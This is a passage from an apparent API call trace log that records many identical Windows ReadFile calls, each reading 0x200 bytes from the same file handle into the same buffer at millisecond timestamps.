lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.471] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.471] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.472] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 
[0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 
lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, 
lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, 
